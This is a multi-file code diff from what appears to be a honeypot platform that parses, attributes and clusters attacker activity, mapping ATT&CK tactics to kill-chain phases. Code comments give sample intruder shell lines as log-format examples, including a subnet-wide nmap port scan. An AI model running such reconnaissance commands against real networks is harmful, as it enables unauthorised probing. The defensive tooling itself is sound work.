            "headers": trigger.headers(),
        }
        produced = await tagger.tag(
            TaggerEvent(
                source_kind="canary_fingerprint",
                source_id=trigger.uuid,
                attacker_uuid=trigger.attacker_id,
                identity_uuid=None,
                session_id=None,
                decky_id=None,
                payload=fingerprint,
            )
        )
        if not produced:
            continue
        buffer.extend(produced)
        if len(buffer) < batch_size:
            continue
        written += await _flush(repo, buffer, dry_run)
        buffer = []

    # Drain whatever is left below the batch threshold.
    if buffer:
        written += await _flush(repo, buffer, dry_run)

    duration = time.monotonic() - t0
    console.print(
        f"source=canary rows={trigger_count} inserted={written} "
        f"dry_run={dry_run} elapsed_s={duration:.2f}"
    )
async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
    """Persist *tags* via ``repo.insert_tags`` and return its result as an int.

    In dry-run mode the repository is not touched and ``0`` is returned.
    """
    if not dry_run:
        return int(await repo.insert_tags(tags))
    return 0

View File

@@ -11,7 +11,7 @@ import signal
import subprocess # nosec B404
import sys
from pathlib import Path
from typing import Any, Callable, Optional
from typing import Optional
import typer
from rich.console import Console
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
return None
def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
"""Return the microservice registry for health-check and relaunch.
On agents these run as systemd units invoking /usr/local/bin/decnet,
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
def _swarmctl_base_url(url: Optional[str]) -> str:
return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL)
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):

View File

@@ -192,70 +192,6 @@ def register(app: typer.Typer) -> None:
except KeyboardInterrupt:
console.print("\n[yellow]Reuse correlator stopped.[/]")
@app.command(name="attribution")
def attribution(
    multi_actor_tick_secs: float = typer.Option(
        60.0, "--multi-actor-tick", "-t",
        help=(
            "Cross-primitive multi_actor correlator tick interval (seconds). "
            "Walks attribution_state for identities flagged on >= 2 "
            "primitives and emits attribution.profile.multi_actor_suspected."
        ),
    ),
    daemon: bool = typer.Option(
        False, "--daemon", "-d",
        help="Detach to background as a daemon process",
    ),
) -> None:
    """Attribution engine v0 — per-(identity, primitive) state machine.

    Subscribes to ``attacker.observation.>`` and, for each event,
    ensures a stub identity row, runs the merger over the full
    per-(identity, primitive) observation series, upserts the
    derived state, and publishes
    ``attribution.profile.state_changed`` only on transition.
    Periodic tick fires
    ``attribution.profile.multi_actor_suspected`` when >= 2
    primitives flag the same identity.

    Closes DEBT-051. Bright-line scope: behavioural coherence and
    drift only — never persona attribution to natural persons.
    """
    # Imported at call time, not at module import time.
    import asyncio
    from decnet.correlation.attribution_worker import (
        run_attribution_loop,
    )
    from decnet.web.dependencies import repo

    if daemon:
        log.info(
            "attribution worker daemonizing tick=%s",
            multi_actor_tick_secs,
        )
        _utils._daemonize()

    log.info(
        "attribution worker command invoked tick=%s",
        multi_actor_tick_secs,
    )
    console.print(
        f"[bold cyan]Attribution engine starting[/] "
        f"multi_actor_tick={multi_actor_tick_secs}s"
    )
    console.print("[dim]Press Ctrl+C to stop[/]")

    async def _run() -> None:
        # The repository is initialised before the attribution loop starts.
        await repo.initialize()
        await run_attribution_loop(
            repo,
            multi_actor_tick_secs=multi_actor_tick_secs,
        )

    try:
        asyncio.run(_run())
    except KeyboardInterrupt:
        console.print("\n[yellow]Attribution engine stopped.[/]")
@app.command(name="clusterer")
def clusterer(
poll_interval_secs: float = typer.Option(
@@ -359,10 +295,3 @@ def register(app: typer.Typer) -> None:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]Campaign clusterer stopped.[/]")
# ``decnet ttp`` and ``decnet ttp-backfill`` moved to
# :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
# is colocated there, mirroring the per-feature CLI split used by
# :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
# ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
# ``decnet ttp`` because the command name is unchanged.

View File

@@ -66,10 +66,7 @@ def cluster_identities(
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
def from_identity_row(
row: dict[str, Any],
ttp_decky_phases: list[dict[str, Any]] | None = None,
) -> IdentityFeatures:
def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
"""Project an ``AttackerIdentity`` projection row dict into an
:class:`IdentityFeatures`.
@@ -78,59 +75,20 @@ def from_identity_row(
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
(JSON list[str] or null).
*ttp_decky_phases* is the optional per-identity payload from
:meth:`BaseRepository.list_ttp_decky_phases` — one row per
``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
populates :attr:`IdentityFeatures.first_phase_per_decky` /
``last_phase_per_decky`` / ``first_seen_per_decky`` /
``last_seen_per_decky`` so the production phase-handoff edge
finally fires. The synthetic fixture path
(:func:`from_synthetic_identity`) is unchanged — fixtures keep
emitting UKC directly.
Phase-handoff fields stay empty until the production-row adapter
learns to mine logs for per-decky phase sequences (TODO.md
"production-side payload + C2 + commands joins"). Without those,
the campaign clusterer falls back to shared-infra + temporal
overlap + cohort signals on production data; the fixture path
exercises the full feature set via :func:`from_synthetic_identity`.
"""
from decnet.clustering.ukc import tactic_to_ukc_phase # noqa: PLC0415
payload_hashes = _parse_json_list(row.get("payload_simhashes"))
c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
first_phase_per_decky: dict[str, str] = {}
last_phase_per_decky: dict[str, str] = {}
first_seen_per_decky: dict[str, float] = {}
last_seen_per_decky: dict[str, float] = {}
decky_set: set[str] = set()
# Rows arrive ordered by ``created_at``; ``setdefault`` preserves
# the FIRST observation per decky, plain assignment captures the
# LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
# phase is pre-target / unobservable) are dropped — they should
# not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
for entry in ttp_decky_phases or []:
decky = entry.get("decky_id")
tactic = entry.get("tactic")
created_at_ts = entry.get("created_at_ts")
if not isinstance(decky, str) or not isinstance(tactic, str):
continue
phase = tactic_to_ukc_phase(tactic)
if phase is None:
continue
ts = float(created_at_ts) if isinstance(
created_at_ts, (int, float)) else 0.0
decky_set.add(decky)
first_phase_per_decky.setdefault(decky, phase.value)
last_phase_per_decky[decky] = phase.value
first_seen_per_decky.setdefault(decky, ts)
last_seen_per_decky[decky] = ts
return IdentityFeatures(
identity_uuid=row["uuid"],
payload_hashes=frozenset(payload_hashes),
c2_endpoints=frozenset(c2_endpoints),
decky_set=frozenset(decky_set),
first_phase_per_decky=first_phase_per_decky,
last_phase_per_decky=last_phase_per_decky,
first_seen_per_decky=first_seen_per_decky,
last_seen_per_decky=last_seen_per_decky,
)
@@ -174,26 +132,8 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
# merged out — their winner is the active row and gets clustered
# on its own. This keeps the campaign graph from double-counting.
active_rows = [r for r in rows if not r.get("merged_into_uuid")]
# Pull TTP-derived per-decky phase observations per identity
# (E.3.15). Failures here are non-fatal — the clusterer falls
# back to the empty phase-handoff signal, same as the legacy
# behavior, so a partial repo doesn't take the worker down.
decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
for r in active_rows:
try:
decky_phases_by_identity[r["uuid"]] = (
await repo.list_ttp_decky_phases(r["uuid"])
)
except Exception: # noqa: BLE001
log.warning(
"campaign clusterer: list_ttp_decky_phases failed "
"for identity %s; phase-handoff edge inert",
r["uuid"],
)
decky_phases_by_identity[r["uuid"]] = []
feature_list: list[IdentityFeatures] = [
from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
for r in active_rows
from_identity_row(r) for r in active_rows
]
row_by_uuid: dict[str, dict[str, Any]] = {
r["uuid"]: r for r in active_rows

View File

@@ -342,7 +342,7 @@ def combined_campaign_weight(
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
Treats one ``SyntheticAttacker`` as one identity — adequate for

View File

@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

View File

@@ -363,9 +363,8 @@ async def _roll_up_fingerprints(
breaks the clusterer tick — the columns just stay stale until the
next pass."""
summaries = extract_fp_summaries(member_rows)
fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
try:
await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
await repo.update_identity_fingerprints(identity_uuid, **summaries)
except Exception: # noqa: BLE001
log.exception(
"clusterer: failed to roll up fingerprints for identity=%s",

View File

@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
def from_synthetic(att) -> Observation:
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
Lives here so test code doesn't import the factory shape into the

View File

@@ -15,7 +15,6 @@ emits no events for unobservable phases.
from __future__ import annotations
from enum import Enum
from typing import Final
class UKCPhase(str, Enum):
@@ -107,96 +106,3 @@ def stage_of(phase: UKCPhase) -> str:
if phase in STAGE_THROUGH:
return "through"
return "out"
# MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
# plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
# Adding additional ICS tactics is a one-line addition. See
# TTP_TAGGING.md "UKC bridge".
ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
# Enterprise
"TA0043": UKCPhase.RECONNAISSANCE, # Reconnaissance
"TA0042": UKCPhase.RESOURCE_DEVELOPMENT, # Resource Development
"TA0001": UKCPhase.DELIVERY, # Initial Access
"TA0002": UKCPhase.EXECUTION, # Execution
"TA0003": UKCPhase.PERSISTENCE, # Persistence
"TA0004": UKCPhase.PRIVILEGE_ESCALATION, # Privilege Escalation
"TA0005": UKCPhase.DEFENSE_EVASION, # Defense Evasion
"TA0006": UKCPhase.CREDENTIAL_ACCESS, # Credential Access
"TA0007": UKCPhase.DISCOVERY, # Discovery
"TA0008": UKCPhase.LATERAL_MOVEMENT, # Lateral Movement
"TA0009": UKCPhase.COLLECTION, # Collection
"TA0011": UKCPhase.COMMAND_AND_CONTROL, # Command and Control
"TA0010": UKCPhase.EXFILTRATION, # Exfiltration
"TA0040": UKCPhase.IMPACT, # Impact
# ICS — first-class projection so MQTT / Conpot / Modbus tags
# don't drop out of campaign rollups when the clusterer projects
# tactic to phase. ICS uses an independent tactic-ID range.
"TA0100": UKCPhase.COLLECTION, # ICS: Collection
"TA0102": UKCPhase.DISCOVERY, # ICS: Discovery
"TA0105": UKCPhase.IMPACT, # ICS: Impact
"TA0106": UKCPhase.IMPACT, # ICS: Impair Process Control
}
# ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
# DECNET does not currently load. They're exempt from the
# enterprise-bundle validation in :func:`validate_against_attack_bundle`
# so a startup check doesn't false-fail the moment ICS rules are wired.
_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
{"TA0100", "TA0102", "TA0105", "TA0106"}
)
def validate_against_attack_bundle() -> None:
    """Check the tactic IDs of :data:`ATTACK_TACTIC_TO_UKC` against the loaded STIX bundle.

    Delegates to ``assert_known_tactic_ids``, passing every key of the map
    and exempting the IDs in ``_NON_ENTERPRISE_TACTICS``.

    Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
    typoed tactic ID surfaces as a fail-closed boot, not a silent
    miss in campaign rollups.
    """
    from decnet.ttp.attack_stix import assert_known_tactic_ids

    mapped_ids = list(ATTACK_TACTIC_TO_UKC.keys())
    exempt_ids = set(_NON_ENTERPRISE_TACTICS)
    assert_known_tactic_ids(
        mapped_ids,
        source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
        exempt=exempt_ids,
    )
def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
    """Look up the :class:`UKCPhase` for an ATT&CK tactic ID (e.g. ``"TA0001"``).

    An ID with no entry in :data:`ATTACK_TACTIC_TO_UKC` yields ``None``
    instead of raising. The map is meant to be closed over the enterprise
    and ICS tactics the rule pack references, so a miss points at a
    contributor bug rather than an expected runtime condition.
    """
    if tactic in ATTACK_TACTIC_TO_UKC:
        return ATTACK_TACTIC_TO_UKC[tactic]
    return None
# Inverse map, built once at import time. Several tactics collide on
# the same phase (e.g. both TA0009 and TA0100 map to COLLECTION). A
# dict comprehension keeps the LAST value written for a key, so we
# iterate ATTACK_TACTIC_TO_UKC in reverse: the entry listed FIRST in
# the forward map (the enterprise tactic) is written last and wins.
# A phase with no entry in the forward map has no inverse and resolves
# to None. See TTP_TAGGING.md §UKC bridge.
# NOTE(review): the previous wording said the pre-target phases
# (RECONNAISSANCE, RESOURCE_DEVELOPMENT, WEAPONIZATION,
# SOCIAL_ENGINEERING) outside OBSERVABLE_PHASES are deliberately lossy
# on the inverse because TTP tags must never assign them. As written,
# ATTACK_TACTIC_TO_UKC contains RECONNAISSANCE (TA0043) and
# RESOURCE_DEVELOPMENT (TA0042), so this comprehension DOES map those
# two back to a tactic. Confirm which behaviour is intended.
_UKC_TO_TACTIC: dict[UKCPhase, str] = {
    phase: tactic
    for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
}


def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
    """Map a :class:`UKCPhase` back to an ATT&CK tactic ID.

    Returns ``None`` for any phase that has no entry in the inverse
    map. When several tactics share a phase, the one listed first in
    :data:`ATTACK_TACTIC_TO_UKC` is returned.

    NOTE(review): this docstring previously stated that phases outside
    :data:`OBSERVABLE_PHASES` (e.g. ``RECONNAISSANCE``,
    ``WEAPONIZATION``) return ``None`` by design. The inverse map is
    built from every forward entry without filtering, and the forward
    map includes ``RECONNAISSANCE`` and ``RESOURCE_DEVELOPMENT``, so
    those two resolve to ``"TA0043"`` / ``"TA0042"`` here. Confirm
    against the CDD test in E.2.9, which pins which phases are lossy.
    """
    return _UKC_TO_TACTIC.get(phase)

View File

@@ -115,11 +115,11 @@ async def run_clusterer_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

View File

@@ -18,7 +18,6 @@ from datetime import datetime
from pathlib import Path
from typing import Any, Callable, Optional
from decnet.artifacts.shards import find_shard_with_sid
from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
@@ -76,21 +75,6 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
)
_RL_MAX_ENTRIES: int = 10_000
# APP-NAMEs we never want to see in the ingestion stream — native unix
# daemons that share a container with a DECNET service. Their logs are
# noise: sshd's "Failed password for root from X" duplicates the
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
# again, and CRON/systemd/etc. say nothing about attacker behavior.
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
_DROP_APPS: frozenset[str] = frozenset(
a.strip()
for a in os.environ.get(
"DECNET_COLLECTOR_DROP_APPS",
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
).split(",")
if a.strip()
)
_rl_lock: threading.Lock = threading.Lock()
_rl_last: dict[tuple[str, str, str, str], float] = {}
@@ -98,11 +82,10 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
def _should_ingest(parsed: dict[str, Any]) -> bool:
"""
Return True if this parsed event should be written to the JSON ingestion
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
rate-limits connection-lifecycle events within a dedup window.
stream. Rate-limited connection-lifecycle events return False when another
event with the same (attacker_ip, decky, service, event_type) was emitted
inside the dedup window.
"""
if parsed.get("service", "") in _DROP_APPS:
return False
event_type = parsed.get("event_type", "")
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
return True
@@ -133,234 +116,6 @@ def _reset_rate_limiter() -> None:
with _rl_lock:
_rl_last.clear()
# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
#
# The TTP worker subscribes to ``attacker.session.ended`` and turns each
# emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
# (see ``decnet/ttp/worker._build_events``). No upstream worker was
# producing that topic — the rule pack therefore never fired on live
# traffic. The aggregator below indexes shell-command events
# per-attacker_ip and emits one ``attacker.session.ended`` envelope
# whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
#
# Memory bound: each attacker_ip's deque is capped by a TTL eviction
# (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
_SESSION_AGG_TTL_SEC: float = _parse_float_env(
"DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
)
# Body of a bash PROMPT_COMMAND CMD line:
# ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
# Splits into the structured fields the inspector renders + the
# residual ``cmd=`` value (which may itself contain spaces — preserve
# everything after ``cmd=`` as one token, do NOT word-split).
_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
# Start of the trailing ``cmd=`` field. Anchored to the beginning of the
# body or to preceding whitespace so a ``cmd=`` substring inside another
# token (e.g. ``pwd=/srv/cmd=x``) is not mistaken for the field itself.
_CMD_FIELD_START_RE = re.compile(r'(?:^|\s)cmd=')


def _parse_cmd_msg(msg: str) -> dict[str, str]:
    """Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.

    Returns the empty dict on a non-CMD msg. ``command`` carries the
    full post-``cmd=`` rest, including any embedded whitespace —
    tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
    everything after the first space.

    The split happens at the first ``cmd=`` that starts a field (start of
    the body or preceded by whitespace). Everything before it is parsed as
    whitespace-separated ``key=value`` pairs; a later duplicate key
    overwrites an earlier one. When no ``cmd=`` field is present the
    result has no ``command`` key.
    """
    if not msg.startswith("CMD "):
        return {}
    body = msg[4:]
    boundary = _CMD_FIELD_START_RE.search(body)
    head = body if boundary is None else body[:boundary.start()]
    out: dict[str, str] = dict(_CMD_BODY_HEAD_KV_RE.findall(head))
    if boundary is not None:
        out["command"] = body[boundary.end():]
    return out
def _parse_iso_ts(value: str) -> Optional[datetime]:
"""Best-effort ISO-8601 parse for parsed event timestamps.
The collector's parser stamps ``timestamp`` either as the original
ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
``fromisoformat`` after a space→T swap. Returns None if neither
shape parses — the aggregator skips events it can't time-stamp.
"""
if not value:
return None
candidates = (value, value.replace(" ", "T"))
for cand in candidates:
try:
return datetime.fromisoformat(cand)
except ValueError:
continue
return None
class _SessionAggregator:
    """Per-attacker_ip command index that emits ``attacker.session.ended``.

    ``command`` events are appended to a per-IP list. A
    ``session_recorded`` event triggers one publish that carries the
    commands indexed for that IP.

    :meth:`add_event` guards all internal state with a single lock and
    performs the publish while still holding it, so it can be called
    from several threads. NOTE(review): holding the lock across the
    publish presumes ``publish_fn`` is non-blocking — confirm against
    the publisher that is injected.
    """

    def __init__(
        self,
        publish_fn: Callable[[str, dict[str, Any], str], None],
        *,
        ttl_sec: float = _SESSION_AGG_TTL_SEC,
    ) -> None:
        """Create an empty aggregator.

        Args:
            publish_fn: Called as ``publish_fn(topic, payload, event_type)``
                once per ``session_recorded`` event.
            ttl_sec: Age in seconds after which indexed commands are dropped.
        """
        self._publish = publish_fn
        self._ttl = ttl_sec
        self._lock = threading.Lock()
        # attacker_ip → list of (timestamp, parsed_event) tuples, in
        # arrival order. Growth is limited only by the TTL eviction that
        # runs on every accepted event.
        self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}

    def add_event(self, parsed: dict[str, Any]) -> None:
        """Index a parsed event; publish on ``session_recorded``.

        Events without a usable ``attacker_ip`` (missing, empty or the
        literal ``"Unknown"``) or without a parseable ``timestamp`` are
        ignored. Every accepted event first triggers TTL eviction, using
        the event's own timestamp as "now".
        """
        event_type = parsed.get("event_type", "")
        attacker_ip = parsed.get("attacker_ip") or ""
        if not attacker_ip or attacker_ip == "Unknown":
            return
        ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
        if ts is None:
            return
        with self._lock:
            self._evict_expired(ts)
            if event_type == "command":
                self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
                return
            if event_type == "session_recorded":
                self._emit_session(parsed, attacker_ip, ts)

    def _evict_expired(self, now: datetime) -> None:
        """Drop commands older than ``self._ttl`` seconds relative to *now*.

        IPs whose list becomes empty are removed from the index entirely.
        """
        cutoff = now.timestamp() - self._ttl
        # Iterate over a snapshot: entries are replaced/deleted in the loop.
        for ip, entries in list(self._cmds.items()):
            kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
            if kept:
                self._cmds[ip] = kept
            else:
                del self._cmds[ip]

    def _emit_session(
        self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
    ) -> None:
        """Build an ``attacker.session.ended`` envelope and publish it.

        The payload carries every command indexed for *attacker_ip* whose
        timestamp is at or after ``ended_at - duration_s``. No upper bound
        is applied. Commands stay in the per-IP list after the slice; TTL
        eviction is the only path that drops them, so back-to-back
        sessions for the same IP can see the same rows.

        ``duration_s`` is read from the event's ``fields``. A value that
        is missing, unparseable or non-finite (``nan`` / ``inf``) is
        treated as ``0.0``, which keeps the window arithmetic and the
        published payload well-defined.

        A failing ``publish_fn`` is logged at debug level and otherwise
        ignored.
        """
        import math  # local import: only needed for the finiteness check

        fields = parsed.get("fields", {}) or {}
        duration_raw = fields.get("duration_s") or "0"
        try:
            duration_s = float(duration_raw)
        except (TypeError, ValueError):
            duration_s = 0.0
        if not math.isfinite(duration_s):
            # float() happily parses "nan"/"inf"; neither is a usable
            # duration, so fall back the same way as for garbage input.
            duration_s = 0.0

        sid = str(fields.get("sid") or "")
        service = str(fields.get("service") or parsed.get("service") or "")
        decky = parsed.get("decky") or ""

        cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
        commands = self._window_commands(attacker_ip, sid, cutoff_lo)
        shard_path = self._resolve_shard(decky, service, sid)

        payload: dict[str, Any] = {
            "session_id": sid or None,
            "attacker_uuid": None,  # consumer resolves via repo
            "attacker_ip": attacker_ip,
            "decky_id": decky,
            "service": service,
            "ended_at": ended_at.isoformat(),
            "duration_s": duration_s,
            "commands": commands,
            "shard_path": shard_path,
        }
        topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
        try:
            self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
        except Exception as exc:  # noqa: BLE001
            logger.debug(
                "collector: session.ended publish failed: %s", exc,
            )

    def _window_commands(
        self, attacker_ip: str, sid: str, cutoff_lo: float,
    ) -> list[dict[str, Any]]:
        """Return payload entries for commands at or after *cutoff_lo*.

        *cutoff_lo* is a POSIX timestamp. The ``#<idx>`` part of each
        entry id is the command's position in the full per-IP list, not
        its position in the filtered result.
        """
        commands: list[dict[str, Any]] = []
        for idx, (cmd_ts, cmd_parsed) in enumerate(self._cmds.get(attacker_ip, [])):
            if cmd_ts.timestamp() < cutoff_lo:
                continue
            cmd_fields = cmd_parsed.get("fields", {}) or {}
            # Pull structured uid/user/src/pwd/command out of the bash
            # msg body so consumers get separate key/value entries
            # instead of one raw ``CMD uid=0 user=... cmd=...`` string.
            parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
            cmd_text = (
                cmd_fields.get("command")
                or cmd_fields.get("cmd")
                or parsed_kv.get("command")
                or cmd_parsed.get("msg", "")
            )
            entry: dict[str, Any] = {
                "id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
                "command_text": str(cmd_text),
                "ts": cmd_ts.isoformat(),
                "decky": cmd_parsed.get("decky", ""),
                "service": cmd_parsed.get("service", ""),
            }
            for key in ("uid", "user", "src", "pwd"):
                value = parsed_kv.get(key) or cmd_fields.get(key)
                if value is not None:
                    entry[key] = value
            commands.append(entry)
        return commands

    def _resolve_shard(self, decky: str, service: str, sid: str) -> Optional[str]:
        """Resolve the session's shard path, or ``None`` when unavailable.

        The lookup is attempted only when *sid*, *decky* and *service*
        are all non-empty. ``ValueError`` / ``OSError`` from
        ``find_shard_with_sid`` are caught and reported through the
        warning below rather than propagated. The path is published as an
        additive ``shard_path`` field so consumers do not each have to
        reach for the disk themselves.
        """
        shard_path: Optional[str] = None
        resolve_error: Optional[str] = None
        if sid and decky and service:
            try:
                resolved = find_shard_with_sid(decky, service, sid)
            except (ValueError, OSError) as exc:
                # PermissionError is a subclass of OSError, so it is
                # covered here without being listed separately.
                resolve_error = f"{type(exc).__name__}: {exc}"
                resolved = None
            if resolved is not None:
                shard_path = str(resolved)
        if shard_path is None and sid:
            # Loud-by-default — the BEHAVE-SHELL handler will skip
            # session.ended events with shard_path=None, so a silent
            # miss here means the profiler panel never hydrates. Surface
            # the most common failure modes inline so the operator can
            # diagnose without grepping decnet/artifacts/shards.py.
            #
            # 1. ARTIFACTS_ROOT not readable by the collector's user
            #    (perm 0750 decnet:decnet vs. User=anti without
            #    SupplementaryGroups=decnet).
            # 2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
            # 3. sessrec hasn't flushed the shard for this sid yet
            #    (collector tick won the race; next tick recovers).
            logger.warning(
                "collector: shard_path=None decky=%s service=%s sid=%s "
                "(error=%s) — profiler will skip this session.ended; "
                "check ARTIFACTS_ROOT perms / service whitelist",
                decky, service, sid, resolve_error or "shard not found",
            )
        return shard_path
# ─── RFC 5424 parser ──────────────────────────────────────────────────────────
_RFC5424_RE = re.compile(
@@ -374,27 +129,6 @@ _RFC5424_RE = re.compile(
r"(\S+) " # 4: MSGID (event_type)
r"(.+)$", # 5: SD element + optional MSG
)
# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
# That inner RFC 5424 line lands on the container's stdout, where the
# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
# sees ``event_type == "-"`` while the real MSGID (``command``) is
# inside the body. We detect that case and re-extract the inner
# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
# ``event_type == "command"`` plus the real source hostname.
#
# Anchored on an ISO-8601 timestamp at the head of the body so we
# don't false-match free-form prose like "Connection from 1.2.3.4".
_INNER_RFC5424_RE = re.compile(
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
r"(\S+)\s+" # 2: inner HOSTNAME
r"(\S+)\s+" # 3: inner APP-NAME
r"\S+\s+" # PROCID (NIL or PID)
r"(\S+)\s+" # 4: inner MSGID
r"(.+)$", # 5: inner SD/MSG remainder
)
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
@@ -434,23 +168,8 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
ts_raw, decky, service, event_type, sd_rest = m.groups()
fields: dict[str, str] = {}
# Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
# stdout envelope around the inner ``logger --msgid command`` line).
# Outer MSGID is NIL; the real MSGID is inside the body. Detect
# the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
# remainder so downstream extraction sees the real header.
if event_type == "-" and sd_rest.startswith("-"):
body = sd_rest[1:].lstrip()
inner = _INNER_RFC5424_RE.match(body)
if inner is not None:
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
decky = i_host
service = i_app
event_type = i_msgid
sd_rest = i_rest
msg: str = ""
if sd_rest.startswith("-"):
msg = sd_rest[1:].lstrip()
elif sd_rest.startswith("["):
@@ -458,28 +177,16 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
if block:
for k, v in _PARAM_RE.findall(block.group(1)):
fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
# Always recover the post-SD message tail, even when the SD
# block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
# syslog auto-emits on bash CMD lines). Without this the body
# of unwrapped PROMPT_COMMAND lines stays empty and the
# attacker_ip kv-fallback below has nothing to scan.
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
if msg_match:
msg = msg_match.group(1).strip()
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
if msg_match:
msg = msg_match.group(1).strip()
else:
msg = sd_rest
attacker_ip = "Unknown"
for fname in _IP_FIELDS:
if fname in fields:
raw = fields[fname]
# remote_addr may be "host:port" — split so identity keys on IP only.
host, _, port = raw.rpartition(":")
if host and port.isdigit():
attacker_ip = host.strip("[]") # handle [::1]:port IPv6 form
fields.setdefault("remote_port", port)
